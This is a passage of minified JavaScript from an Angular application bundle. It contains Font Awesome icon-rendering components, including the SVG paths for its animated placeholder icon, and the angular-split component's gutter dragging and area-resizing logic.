-256)")}}}({transform:e.transform,containerWidth:c.width,iconWidth:r.width}),Re={tag:"rect",attributes:ia(ia({},tI),{},{fill:"white"})},Fe=q.children?{children:q.children.map(eH)}:{},Ne={tag:"g",attributes:ia({},pe.inner),children:[eH(ia({tag:q.tag,attributes:ia(ia({},q.attributes),pe.path)},Fe))]},et={tag:"g",attributes:ia({},pe.outer),children:[Ne]},ut="mask-".concat(d||vb()),Ze="clip-".concat(d||vb()),yt={tag:"mask",attributes:ia(ia({},tI),{},{id:ut,maskUnits:"userSpaceOnUse",maskContentUnits:"userSpaceOnUse"}),children:[Re,et]},It={tag:"defs",children:[{tag:"clipPath",attributes:{id:Ze},children:(t=te,"g"===t.tag?t.children:[t])},yt]};return i.push(It,{tag:"rect",attributes:ia({fill:"currentColor","clip-path":"url(#".concat(Ze,")"),mask:"url(#".concat(ut,")")},tI)}),{children:i,attributes:n}}}},{provides:function(a){var e=!1;vp.matchMedia&&(e=vp.matchMedia("(prefers-reduced-motion: reduce)").matches),a.missingIconAbstract=function(){var i=[],n={fill:"currentColor"},r={attributeType:"XML",repeatCount:"indefinite",dur:"2s"};i.push({tag:"path",attributes:ia(ia({},n),{},{d:"M156.5,447.7l-12.6,29.5c-18.7-9.5-35.9-21.2-51.5-34.9l22.7-22.7C127.6,430.5,141.5,440,156.5,447.7z M40.6,272H8.5 c1.4,21.2,5.4,41.7,11.7,61.1L50,321.2C45.1,305.5,41.8,289,40.6,272z M40.6,240c1.4-18.8,5.2-37,11.1-54.1l-29.5-12.6 C14.7,194.3,10,216.7,8.5,240H40.6z M64.3,156.5c7.8-14.9,17.2-28.8,28.1-41.5L69.7,92.3c-13.7,15.6-25.5,32.8-34.9,51.5 L64.3,156.5z M397,419.6c-13.9,12-29.4,22.3-46.1,30.4l11.9,29.8c20.7-9.9,39.8-22.6,56.9-37.6L397,419.6z M115,92.4 c13.9-12,29.4-22.3,46.1-30.4l-11.9-29.8c-20.7,9.9-39.8,22.6-56.8,37.6L115,92.4z M447.7,355.5c-7.8,14.9-17.2,28.8-28.1,41.5 l22.7,22.7c13.7-15.6,25.5-32.9,34.9-51.5L447.7,355.5z M471.4,272c-1.4,18.8-5.2,37-11.1,54.1l29.5,12.6 c7.5-21.1,12.2-43.5,13.6-66.8H471.4z M321.2,462c-15.7,5-32.2,8.2-49.2,9.4v32.1c21.2-1.4,41.7-5.4,61.1-11.7L321.2,462z M240,471.4c-18.8-1.4-37-5.2-54.1-11.1l-12.6,29.5c21.1,7.5,43.5,12.2,66.8,13.6V471.4z M462,190.8c5,15.7,8.2,32.2,9.4,49.2h32.1 c-1.4-21.2-5.4-41.7-11.7-61.1L462,190.8z M92.4,397c-12-13.9-22.3-29.4-30.4-46.1l-29.8,11.9c9.9,20.7,22.6,39.8,37.6,56.9 L92.4,397z M272,40.6c18.8,1.4,36.9,5.2,54.1,11.1l12.6-29.5C317.7,14.7,295.3,10,272,8.5V40.6z M190.8,50 c15.7-5,32.2-8.2,49.2-9.4V8.5c-21.2,1.4-41.7,5.4-61.1,11.7L190.8,50z M442.3,92.3L419.6,115c12,13.9,22.3,29.4,30.5,46.1 l29.8-11.9C470,128.5,457.3,109.4,442.3,92.3z M397,92.4l22.7-22.7c-15.6-13.7-32.8-25.5-51.5-34.9l-12.6,29.5 C370.4,72.1,384.4,81.5,397,92.4z"})});var c=ia(ia({},r),{},{attributeName:"opacity"}),d={tag:"circle",attributes:ia(ia({},n),{},{cx:"256",cy:"364",r:"28"}),children:[]};return e||d.children.push({tag:"animate",attributes:ia(ia({},r),{},{attributeName:"r",values:"28;14;28;28;14;28;"})},{tag:"animate",attributes:ia(ia({},c),{},{values:"1;0;1;1;0;1;"})}),i.push(d),i.push({tag:"path",attributes:ia(ia({},n),{},{opacity:"1",d:"M263.7,312h-16c-6.6,0-12-5.4-12-12c0-71,77.4-63.9,77.4-107.8c0-20-17.8-40.2-57.4-40.2c-29.1,0-44.3,9.6-59.2,28.7 c-3.9,5-11.1,6-16.2,2.4l-13.1-9.2c-5.6-3.9-6.9-11.8-2.6-17.2c21.2-27.2,46.4-44.7,91.2-44.7c52.3,0,97.4,29.8,97.4,80.2 c0,67.6-77.4,63.5-77.4,107.8C275.7,306.6,270.3,312,263.7,312z"}),children:e?[]:[{tag:"animate",attributes:ia(ia({},c),{},{values:"1;0;0;0;0;1;"})}]}),e||i.push({tag:"path",attributes:ia(ia({},n),{},{opacity:"0",d:"M232.5,134.5l7,168c0.3,6.4,5.6,11.5,12,11.5h9c6.4,0,11.7-5.1,12-11.5l7-168c0.3-6.8-5.2-12.5-12-12.5h-23 C237.7,122,232.2,127.7,232.5,134.5z"}),children:[{tag:"animate",attributes:ia(ia({},c),{},{values:"0;0;1;1;0;0;"})}]}),{tag:"g",attributes:{class:"missing"},children:i}}}},{hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-symbol");return e.symbol=null!==n&&(""===n||n),e}}}}],{mixoutsTo:Ql});var fMe=Ql.parse,pMe=Ql.icon;const _Me=["*"],yMe=t=>{const a={"fa-spin":t.spin,"fa-pulse":t.pulse,"fa-fw":t.fixedWidth,"fa-border":t.border,"fa-inverse":t.inverse,"fa-layers-counter":t.counter,"fa-flip-horizontal":"horizontal"===t.flip||"both"===t.flip,"fa-flip-vertical":"vertical"===t.flip||"both"===t.flip,[`fa-${t.size}`]:null!==t.size,[`fa-rotate-${t.rotate}`]:null!==t.rotate,[`fa-pull-${t.pull}`]:null!==t.pull,[`fa-stack-${t.stackItemSize}`]:null!=t.stackItemSize};return Object.keys(a).map(e=>a[e]?e:null).filter(e=>e)};let vMe=(()=>{class t{constructor(){this.defaultPrefix="fas",this.fallbackIcon=null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),AMe=(()=>{class t{constructor(){this.definitions={}}addIcons(...e){for(const i of e){i.prefix in this.definitions||(this.definitions[i.prefix]={}),this.definitions[i.prefix][i.iconName]=i;for(const n of i.icon[2])"string"==typeof n&&(this.definitions[i.prefix][n]=i)}}addIconPacks(...e){for(const i of e){const n=Object.keys(i).map(r=>i[r]);this.addIcons(...n)}}getIconDefinition(e,i){return e in this.definitions&&i in this.definitions[e]?this.definitions[e][i]:null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),TMe=(()=>{class t{constructor(){this.stackItemSize="1x"}ngOnChanges(e){if("size"in e)throw new Error('fa-icon is not allowed to customize size when used inside fa-stack. Set size on the enclosing fa-stack instead: <fa-stack size="4x">...</fa-stack>.')}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["fa-icon","stackItemSize",""],["fa-duotone-icon","stackItemSize",""]],inputs:{stackItemSize:"stackItemSize",size:"size"},features:[sa]}),t})(),EMe=(()=>{class t{constructor(e,i){this.renderer=e,this.elementRef=i}ngOnInit(){this.renderer.addClass(this.elementRef.nativeElement,"fa-stack")}ngOnChanges(e){"size"in e&&(null!=e.size.currentValue&&this.renderer.addClass(this.elementRef.nativeElement,`fa-${e.size.currentValue}`),null!=e.size.previousValue&&this.renderer.removeClass(this.elementRef.nativeElement,`fa-${e.size.previousValue}`))}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["fa-stack"]],inputs:{size:"size"},features:[sa],ngContentSelectors:_Me,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2}),t})(),tH=(()=>{class t{constructor(e,i,n,r,c){this.sanitizer=e,this.config=i,this.iconLibrary=n,this.stackItem=r,this.classes=[],null!=c&&null==r&&console.error('FontAwesome: fa-icon and fa-duotone-icon elements must specify stackItemSize attribute when wrapped into fa-stack. Example: <fa-icon stackItemSize="2x"></fa-icon>.')}ngOnChanges(e){if(null==this.icon&&null==this.config.fallbackIcon)return(()=>{throw new Error("Property `icon` is required for `fa-icon`/`fa-duotone-icon` components.")})();let i=null;if(i=null==this.icon?this.config.fallbackIcon:this.icon,e){const n=this.findIconDefinition(i);if(null!=n){const r=this.buildParams();this.renderIcon(n,r)}}}render(){this.ngOnChanges({})}findIconDefinition(e){const i=((t,a)=>(t=>void 0!==t.prefix&&void 0!==t.iconName)(t)?t:Array.isArray(t)&&2===t.length?{prefix:t[0],iconName:t[1]}:"string"==typeof t?{prefix:a,iconName:t}:void 0)(e,this.config.defaultPrefix);if("icon"in i)return i;const n=this.iconLibrary.getIconDefinition(i.prefix,i.iconName);return null!=n?n:((t=>{throw new Error(`Could not find icon with iconName=${t.iconName} and prefix=${t.prefix} in the icon library.`)})(i),null)}buildParams(){const e={flip:this.flip,spin:this.spin,pulse:this.pulse,border:this.border,inverse:this.inverse,size:this.size||null,pull:this.pull||null,rotate:this.rotate||null,fixedWidth:"boolean"==typeof this.fixedWidth?this.fixedWidth:this.config.fixedWidth,stackItemSize:null!=this.stackItem?this.stackItem.stackItemSize:null},i="string"==typeof this.transform?fMe.transform(this.transform):this.transform;return{title:this.title,transform:i,classes:[...yMe(e),...this.classes],mask:null!=this.mask?this.findIconDefinition(this.mask):null,styles:null!=this.styles?this.styles:{},symbol:this.symbol,attributes:{role:this.a11yRole}}}renderIcon(e,i){const n=pMe(e,i);this.renderedIconHTML=this.sanitizer.bypassSecurityTrustHtml(n.html.join("\n"))}}return t.\u0275fac=function(e){return new(e||t)(Ee(cy),Ee(vMe),Ee(AMe),Ee(TMe,8),Ee(EMe,8))},t.\u0275cmp=Wt({type:t,selectors:[["fa-icon"]],hostAttrs:[1,"ng-fa-icon"],hostVars:2,hostBindings:function(e,i){2&e&&(Gs("innerHTML",i.renderedIconHTML,Hc),Rt("title",i.title))},inputs:{icon:"icon",title:"title",spin:"spin",pulse:"pulse",mask:"mask",styles:"styles",flip:"flip",size:"size",pull:"pull",border:"border",inverse:"inverse",symbol:"symbol",rotate:"rotate",fixedWidth:"fixedWidth",classes:"classes",transform:"transform",a11yRole:"a11yRole"},features:[sa],decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})(),iH=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const DMe=["gutterEls"];function xMe(t,a){if(1&t){const e=Ye();m(0,"div",2,3),he("keydown",function(n){be(e);const r=B().index;return Me(B().startKeyboardDrag(n,2*r+1,r+1))})("mousedown",function(n){be(e);const r=B().index;return Me(B().startMouseDrag(n,2*r+1,r+1))})("touchstart",function(n){be(e);const r=B().index;return Me(B().startMouseDrag(n,2*r+1,r+1))})("mouseup",function(n){be(e);const r=B().index;return Me(B().clickGutter(n,r+1))})("touchend",function(n){be(e);const r=B().index;return Me(B().clickGutter(n,r+1))}),it(2,"div",4),u()}if(2&t){const e=B(),i=e.index,n=e.$implicit,r=B();ri("flex-basis",r.gutterSize,"px")("order",2*i+1),Rt("aria-label",r.gutterAriaLabel)("aria-orientation",r.direction)("aria-valuemin",n.minSize)("aria-valuemax",n.maxSize)("aria-valuenow",n.size)("aria-valuetext",r.getAriaAreaSizeText(n.size))}}function wMe(t,a){1&t&&ne(0,xMe,3,10,"div",1),2&t&&V("ngIf",!1===a.last)}const IMe=["*"];function Eb(t){if(void 0!==t.changedTouches&&t.changedTouches.length>0)return{x:t.changedTouches[0].clientX,y:t.changedTouches[0].clientY};if(void 0!==t.clientX&&void 0!==t.clientY)return{x:t.clientX,y:t.clientY};if(void 0!==t.currentTarget){const a=t.currentTarget;return{x:a.offsetLeft,y:a.offsetTop}}return null}function aH(t,a,e){return Math.abs(t.x-a.x)<=e&&Math.abs(t.y-a.y)<=e}function nH(t,a){const e=t.nativeElement.getBoundingClientRect();return"horizontal"===a?e.width:e.height}function Db(t){return"boolean"==typeof t?t:"false"!==t}function Dp(t,a){return null==t?a:(t=Number(t),!isNaN(t)&&t>=0?t:a)}function oH(t,a){if("percent"===t){const e=a.reduce((i,n)=>null!==n?i+n:i,0);return a.every(i=>null!==i)&&e>99.9&&e<100.1}if("pixel"===t)return 1===a.filter(e=>null===e).length}function PA(t){return null===t.size?null:!0===t.component.lockSize?t.size:null===t.component.minSize?null:t.component.minSize>t.size?t.size:t.component.minSize}function OA(t){return null===t.size?null:!0===t.component.lockSize?t.size:null===t.component.maxSize?null:t.component.maxSize<t.size?t.size:t.component.maxSize}function X1(t,a,e,i){return a.reduce((n,r)=>{const c=function SMe(t,a,e,i){return 0===e?{areaSnapshot:a,pixelAbsorb:0,percentAfterAbsorption:a.sizePercentAtStart,pixelRemain:0}:0===a.sizePixelAtStart&&e<0?{areaSnapshot:a,pixelAbsorb:0,percentAfterAbsorption:0,pixelRemain:e}:"percent"===t?function kMe(t,a,e){const n=(t.sizePixelAtStart+a)/e*100;if(a>0){if(null!==t.area.maxSize&&n>t.area.maxSize){const r=t.area.maxSize/100*e;return{areaSnapshot:t,pixelAbsorb:r,percentAfterAbsorption:t.area.maxSize,pixelRemain:t.sizePixelAtStart+a-r}}return{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:n>100?100:n,pixelRemain:0}}if(a<0){if(null!==t.area.minSize&&n<t.area.minSize){const r=t.area.minSize/100*e;return{areaSnapshot:t,pixelAbsorb:r,percentAfterAbsorption:t.area.minSize,pixelRemain:t.sizePixelAtStart+a-r}}return n<0?{areaSnapshot:t,pixelAbsorb:-t.sizePixelAtStart,percentAfterAbsorption:0,pixelRemain:a+t.sizePixelAtStart}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:n,pixelRemain:0}}}(a,e,i):"pixel"===t?function PMe(t,a,e){const i=t.sizePixelAtStart+a;return a>0?null!==t.area.maxSize&&i>t.area.maxSize?{areaSnapshot:t,pixelAbsorb:t.area.maxSize-t.sizePixelAtStart,percentAfterAbsorption:-1,pixelRemain:i-t.area.maxSize}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:-1,pixelRemain:0}:a<0?null!==t.area.minSize&&i<t.area.minSize?{areaSnapshot:t,pixelAbsorb:t.area.minSize+a-i,percentAfterAbsorption:-1,pixelRemain:i-t.area.minSize}:i<0?{areaSnapshot:t,pixelAbsorb:-t.sizePixelAtStart,percentAfterAbsorption:-1,pixelRemain:a+t.sizePixelAtStart}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:-1,pixelRemain:0}:void 0}(a,e):void 0}(t,r,n.remain,i);return n.list.push(c),n.remain=c.pixelRemain,n},{remain:e,list:[]})}function rH(t,a){"percent"===t?a.areaSnapshot.area.size=a.percentAfterAbsorption:"pixel"===t&&null!==a.areaSnapshot.area.size&&(a.areaSnapshot.area.size=a.areaSnapshot.sizePixelAtStart+a.pixelAbsorb)}const OMe=new ni("angular-split-global-config");let Zh=(()=>{class t{constructor(e,i,n,r,c){this.ngZone=e,this.elRef=i,this.cdRef=n,this.renderer=r,this.gutterClickDeltaPx=2,this._config={direction:"horizontal",unit:"percent",gutterSize:11,gutterStep:1,restrictMove:!1,useTransition:!1,disabled:!1,dir:"ltr",gutterDblClickDuration:0},this.dragStart=new Tt(!1),this.dragEnd=new Tt(!1),this.gutterClick=new Tt(!1),this.gutterDblClick=new Tt(!1),this.dragProgressSubject=new J,this.dragProgress$=this.dragProgressSubject.asObservable(),this.isDragging=!1,this.isWaitingClear=!1,this.isWaitingInitialMove=!1,this.dragListeners=[],this.snapshot=null,this.startPoint=null,this.endPoint=null,this.displayedAreas=[],this.hiddenAreas=[],this._clickTimeout=null,this.direction=this._direction,this._config=c?Object.assign(this._config,c):this._config,Object.keys(this._config).forEach(d=>{this[d]=this._config[d]})}set direction(e){this._direction="vertical"===e?"vertical":"horizontal",this.renderer.addClass(this.elRef.nativeElement,`as-${this._direction}`),this.renderer.removeClass(this.elRef.nativeElement,"as-"+("vertical"===this._direction?"horizontal":"vertical")),this.build(!1,!1)}get direction(){return this._direction}set unit(e){this._unit="pixel"===e?"pixel":"percent",this.renderer.addClass(this.elRef.nativeElement,`as-${this._unit}`),this.renderer.removeClass(this.elRef.nativeElement,"as-"+("pixel"===this._unit?"percent":"pixel")),this.build(!1,!0)}get unit(){return this._unit}set gutterSize(e){this._gutterSize=Dp(e,11),this.build(!1,!1)}get gutterSize(){return this._gutterSize}set gutterStep(e){this._gutterStep=Dp(e,1)}get gutterStep(){return this._gutterStep}set restrictMove(e){this._restrictMove=Db(e)}get restrictMove(){return this._restrictMove}set useTransition(e){this._useTransition=Db(e),this._useTransition?this.renderer.addClass(this.elRef.nativeElement,"as-transition"):this.renderer.removeClass(this.elRef.nativeElement,"as-transition")}get useTransition(){return this._useTransition}set disabled(e){this._disabled=Db(e),this._disabled?this.renderer.addClass(this.elRef.nativeElement,"as-disabled"):this.renderer.removeClass(this.elRef.nativeElement,"as-disabled")}get disabled(){return this._disabled}set dir(e){this._dir="rtl"===e?"rtl":"ltr",this.renderer.setAttribute(this.elRef.nativeElement,"dir",this._dir)}get dir(){return this._dir}set gutterDblClickDuration(e){this._gutterDblClickDuration=Dp(e,0)}get gutterDblClickDuration(){return this._gutterDblClickDuration}get transitionEnd(){return new G(e=>this.transitionEndSubscriber=e).pipe(dp(20))}ngAfterViewInit(){this.ngZone.runOutsideAngular(()=>{setTimeout(()=>this.renderer.addClass(this.elRef.nativeElement,"as-init"))})}getNbGutters(){return 0===this.displayedAreas.length?0:this.displayedAreas.length-1}addArea(e){const i={component:e,order:0,size:0,minSize:null,maxSize:null,sizeBeforeCollapse:null,gutterBeforeCollapse:0};!0===e.visible?(this.displayedAreas.push(i),this.build(!0,!0)):this.hiddenAreas.push(i)}removeArea(e){if(this.displayedAreas.some(i=>i.component===e)){const i=this.displayedAreas.find(n=>n.component===e);this.displayedAreas.splice(this.displayedAreas.indexOf(i),1),this.build(!0,!0)}else if(this.hiddenAreas.some(i=>i.component===e)){const i=this.hiddenAreas.find(n=>n.component===e);this.hiddenAreas.splice(this.hiddenAreas.indexOf(i),1)}}updateArea(e,i,n){!0===e.visible&&this.build(i,n)}showArea(e){const i=this.hiddenAreas.find(r=>r.component===e);if(void 0===i)return;const n=this.hiddenAreas.splice(this.hiddenAreas.indexOf(i),1);this.displayedAreas.push(...n),this.build(!0,!0)}hideArea(e){const i=this.displayedAreas.find(r=>r.component===e);if(void 0===i)return;const n=this.displayedAreas.splice(this.displayedAreas.indexOf(i),1);n.forEach(r=>{r.order=0,r.size=0}),this.hiddenAreas.push(...n),this.build(!0,!0)}getVisibleAreaSizes(){return this.displayedAreas.map(e=>null===e.size?"*":e.size)}setVisibleAreaSizes(e){if(e.length!==this.displayedAreas.length)return!1;const i=e.map(r=>Dp(r,null));return!1!==oH(this.unit,i)&&(this.displayedAreas.forEach((r,c)=>r.component._size=i[c]),this.build(!1,!0),!0)}build(e,i){if(this.stopDragging(),!0===e&&(this.displayedAreas.every(n=>null!==n.component.order)&&this.displayedAreas.sort((n,r)=>n.component.order-r.component.order),this.displayedAreas.forEach((n,r)=>{n.order=2*r,n.component.setStyleOrder(n.order)})),!0===i){const n=oH(this.unit,this.displayedAreas.map(r=>r.component.size));switch(this.unit){case"percent":{const r=100/this.displayedAreas.length;this.displayedAreas.forEach(c=>{c.size=n?c.component.size:r,c.minSize=PA(c),c.maxSize=OA(c)});break}case"pixel":if(n)this.displayedAreas.forEach(r=>{r.size=r.component.size,r.minSize=PA(r),r.maxSize=OA(r)});else{const r=this.displayedAreas.filter(c=>null===c.component.size);if(0===r.length&&this.displayedAreas.length>0)this.displayedAreas.forEach((c,d)=>{c.size=0===d?null:c.component.size,c.minSize=0===d?null:PA(c),c.maxSize=0===d?null:OA(c)});else if(r.length>1){let c=!1;this.displayedAreas.forEach(d=>{null===d.component.size?!1===c?(d.size=null,d.minSize=null,d.maxSize=null,c=!0):(d.size=100,d.minSize=null,d.maxSize=null):(d.size=d.component.size,d.minSize=PA(d),d.maxSize=OA(d))})}}}}this.refreshStyleSizes(),this.cdRef.markForCheck()}refreshStyleSizes(){if("percent"===this.unit)if(1===this.displayedAreas.length)this.displayedAreas[0].component.setStyleFlex(0,0,"100%",!1,!1);else{const e=this.getNbGutters()*this.gutterSize;this.displayedAreas.forEach(i=>{i.component.setStyleFlex(0,0,`calc( ${i.size}% - ${i.size/100*e}px )`,null!==i.minSize&&i.minSize===i.size,null!==i.maxSize&&i.maxSize===i.size)})}else"pixel"===this.unit&&this.displayedAreas.forEach(e=>{null===e.size?e.component.setStyleFlex(1,1,1===this.displayedAreas.length?"100%":"auto",!1,!1):1===this.displayedAreas.length?e.component.setStyleFlex(0,0,"100%",!1,!1):e.component.setStyleFlex(0,0,`${e.size}px`,null!==e.minSize&&e.minSize===e.size,null!==e.maxSize&&e.maxSize===e.size)})}clickGutter(e,i){const n=Eb(e);this.startPoint&&aH(this.startPoint,n,this.gutterClickDeltaPx)&&(!this.isDragging||this.isWaitingInitialMove)&&(null!==this._clickTimeout?(window.clearTimeout(this._clickTimeout),this._clickTimeout=null,this.notify("dblclick",i),this.stopDragging()):this._clickTimeout=window.setTimeout(()=>{this._clickTimeout=null,this.notify("click",i),this.stopDragging()},this.gutterDblClickDuration))}startKeyboardDrag(e,i,n){if(!0===this.disabled||!0===this.isWaitingClear)return;const r=function RMe(t,a){if("horizontal"===a)switch(t.key){case"ArrowLeft":case"ArrowRight":case"PageUp":case"PageDown":break;default:return null}if("vertical"===a)switch(t.key){case"ArrowUp":case"ArrowDown":case"PageUp":case"PageDown":break;default:return null}const e=t.currentTarget,i="PageUp"===t.key||"PageDown"===t.key?500:50;let n=e.offsetLeft,r=e.offsetTop;switch(t.key){case"ArrowLeft":n-=i;break;case"ArrowRight":n+=i;break;case"ArrowUp":r-=i;break;case"ArrowDown":r+=i;break;case"PageUp":"vertical"===a?r-=i:n+=i;break;case"PageDown":"vertical"===a?r+=i:n-=i;break;default:return null}return{x:n,y:r}}(e,this.direction);null!==r&&(this.endPoint=r,this.startPoint=Eb(e),e.preventDefault(),e.stopPropagation(),this.setupForDragEvent(i,n),this.startDragging(),this.drag(),this.stopDragging())}startMouseDrag(e,i,n){e.preventDefault(),e.stopPropagation(),this.startPoint=Eb(e),null!==this.startPoint&&!0!==this.disabled&&!0!==this.isWaitingClear&&(this.setupForDragEvent(i,n),this.dragListeners.push(this.renderer.listen("document","mouseup",this.stopDragging.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchend",this.stopDragging.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchcancel",this.stopDragging.bind(this))),this.ngZone.runOutsideAngular(()=>{this.dragListeners.push(this.renderer.listen("document","mousemove",this.mouseDragEvent.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchmove",this.mouseDragEvent.bind(this)))}),this.startDragging())}setupForDragEvent(e,i){this.snapshot={gutterNum:i,lastSteppedOffset:0,allAreasSizePixel:nH(this.elRef,this.direction)-this.getNbGutters()*this.gutterSize,allInvolvedAreasSizePercent:100,areasBeforeGutter:[],areasAfterGutter:[]},this.displayedAreas.forEach(n=>{const r={area:n,sizePixelAtStart:nH(n.component.elRef,this.direction),sizePercentAtStart:"percent"===this.unit?n.size:-1};n.order<e?!0===this.restrictMove?this.snapshot.areasBeforeGutter=[r]:this.snapshot.areasBeforeGutter.unshift(r):n.order>e&&(!0===this.restrictMove?0===this.snapshot.areasAfterGutter.length&&(this.snapshot.areasAfterGutter=[r]):this.snapshot.areasAfterGutter.push(r))}),this.snapshot.allInvolvedAreasSizePercent=[...this.snapshot.areasBeforeGutter,...this.snapshot.areasAfterGutter].reduce((n,r)=>n+r.sizePercentAtStart,0)}startDragging(){this.displayedAreas.forEach(e=>e.component.lockEvents()),this.isDragging=!0,this.isWaitingInitialMove=!0}mouseDragEvent(e){e.preventDefault(),e.stopPropagation();const i=Eb(e);null!==this._clickTimeout&&!aH(this.startPoint,i,this.gutterClickDeltaPx)&&(window.clearTimeout(this._clickTimeout),this._clickTimeout=null),!1!==this.isDragging&&(this.endPoint=Eb(e),null!==this.endPoint&&this.drag())}drag(){if(this.isWaitingInitialMove){if(this.startPoint.x===this.endPoint.x&&this.startPoint.y===this.endPoint.y)return;this.ngZone.run(()=>{this.isWaitingInitialMove=!1,this.renderer.addClass(this.elRef.nativeElement,"as-dragging"),this.renderer.addClass(this.gutterEls.toArray()[this.snapshot.gutterNum-1].nativeElement,"as-dragged"),this.notify("start",this.snapshot.gutterNum)})}let e="horizontal"===this.direction?this.startPoint.x-this.endPoint.x:this.startPoint.y-this.endPoint.y;"rtl"===this.dir&&(e=-e);const i=Math.round(e/this.gutterStep)*this.gutterStep;if(i===this.snapshot.lastSteppedOffset)return;this.snapshot.lastSteppedOffset=i;let n=X1(this.unit,this.snapshot.areasBeforeGutter,-i,this.snapshot.allAreasSizePixel),r=X1(this.unit,this.snapshot.areasAfterGutter,i,this.snapshot.allAreasSizePixel);if(0!==n.remain&&0!==r.remain?Math.abs(n.remain)===Math.abs(r.remain)||(Math.abs(n.remain)>Math.abs(r.remain)?r=X1(this.unit,this.snapshot.areasAfterGutter,i+n.remain,this.snapshot.allAreasSizePixel):n=X1(this.unit,this.snapshot.areasBeforeGutter,-(i-r.remain),this.snapshot.allAreasSizePixel)):0!==n.remain?r=X1(this.unit,this.snapshot.areasAfterGutter,i+n.remain,this.snapshot.allAreasSizePixel):0!==r.remain&&(n=X1(this.unit,this.snapshot.areasBeforeGutter,-(i-r.remain),this.snapshot.allAreasSizePixel)),"percent"===this.unit){const c=[...n.list,...r.list],d=c.find(T=>0!==T.percentAfterAbsorption&&T.percentAfterAbsorption!==T.areaSnapshot.area.minSize&&T.percentAfterAbsorption!==T.areaSnapshot.area.maxSize);d&&(d.percentAfterAbsorption=this.snapshot.allInvolvedAreasSizePercent-c.filter(T=>T!==d).reduce((T,k)=>T+k.percentAfterAbsorption,0))}n.list.forEach(c=>rH(this.unit,c)),r.list.forEach(c=>rH(this.unit,c)),this.refreshStyleSizes(),this.notify("progress",this.snapshot.gutterNum)}stopDragging(e){if(e&&(e.preventDefault(),e.stopPropagation()),!1!==this.isDragging){for(this.displayedAreas.forEach(i=>i.component.unlockEvents());this.dragListeners.length>0;){const i=this.dragListeners.pop();i&&i()}this.isDragging=!1,!1===this.isWaitingInitialMove&&this.notify("end",this.snapshot.gutterNum),this.renderer.removeClass(this.elRef.nativeElement,"as-dragging"),this.renderer.removeClass(this.gutterEls.toArray()[this.snapshot.gutterNum-1].nativeElement,"as-dragged"),this.snapshot=null,this.isWaitingClear=!0,this.ngZone.runOutsideAngular(()=>{setTimeout(()=>{this.startPoint=null,this.endPoint=null,this.isWaitingClear=!1})})}}notify(e,i){const n=this.getVisibleAreaSizes();"start"===e?this.dragStart.emit({gutterNum:i,sizes:n}):"end"===e?this.dragEnd.emit({gutterNum:i,sizes:n}):"click"===e?this.gutterClick.emit({gutterNum:i,sizes:n}):"dblclick"===e?this.gutterDblClick.emit({gutterNum:i,sizes:n}):"transitionEnd"===e?this.transitionEndSubscriber&&this.ngZone.run(()=>this.transitionEndSubscriber.next(n)):"progress"===e&&this.dragProgressSubject.next({gutterNum:i,sizes:n})}ngOnDestroy(){this.stopDragging()}collapseArea(e,i,n){const r=this.displayedAreas.find(T=>T.component===e);if(void 0===r)return;const c="right"===n?1:-1;r.sizeBeforeCollapse||(r.sizeBeforeCollapse=r.size,r.gutterBeforeCollapse=c),r.size=i;const d=this.gutterEls.find(T=>T.nativeElement.style.order===`${r.order+c}`);d&&this.renderer.addClass(d.nativeElement,"as-split-gutter-collapsed"),this.updateArea(e,!1,!1)}expandArea(e){const i=this.displayedAreas.find(r=>r.component===e);if(void 0===i||!i.sizeBeforeCollapse)return;i.size=i.sizeBeforeCollapse,i.sizeBeforeCollapse=null;const n=this.gutterEls.find(r=>r.nativeElement.style.order===`${i.order+i.gutterBeforeCollapse}`);n&&this.renderer.removeClass(n.nativeElement,"as-split-gutter-collapsed"),this.updateArea(e,!1,!1)}getAriaAreaSizeText(e){return null===e?null:e.toFixed(0)+" "+this.unit}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Ma),Ee(wr),Ee(OMe,8))},t.\u0275cmp=Wt({type:t,selectors:[["as-split"]],viewQuery:function(e,i){if(1&e&&Mi(DMe,5),2&e){let n;Vt(n=Bt())&&(i.gutterEls=n)}},inputs:{direction:"direction",unit:"unit",gutterSize:"gutterSize",gutterStep:"gutterStep",restrictMove:"restrictMove",useTransition:"useTransition",disabled:"disabled",dir:"dir",gutterDblClickDuration:"gutterDblClickDuration",gutterClickDeltaPx:"gutterClickDeltaPx",gutterAriaLabel:"gutterAriaLabel"},outputs:{transitionEnd:"transitionEnd",dragStart:"dragStart",dragEnd:"dragEnd",gutterClick:"gutterClick",gutterDblClick:"gutterDblClick"},exportAs:["asSplit"],ngContentSelectors:IMe,decls:2,vars:1,consts:[["ngFor","",3,"ngForOf"],["role","slider","tabindex","0","class","as-split-gutter",3,"flex-basis","order","keydown","mousedown","touchstart","mouseup","touchend",4,"ngIf"],["role","slider","tabindex","0",1,"as-split-gutter",3,"keydown","mousedown","touchstart","mouseup","touchend"],["gutterEls",""],[1,"as-split-gutter-icon"]],template:function(e,i){1&e&&(Jn(),va(0),ne(1,wMe,1,1,"ng-template",0)),2&e&&(C(1),V("ngForOf",i.displayedAreas))},dependencies:[Zi,Ri],styles:["[_nghost-%COMP%]{display:flex;flex-wrap:nowrap;justify-content:flex-start;align-items:stretch;overflow:hidden;width:100%;height:100%}[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{border:none;flex-grow:0;flex-shrink:0;background-color:#eee;display:flex;align-items:center;justify-content:center}[_nghost-%COMP%] > 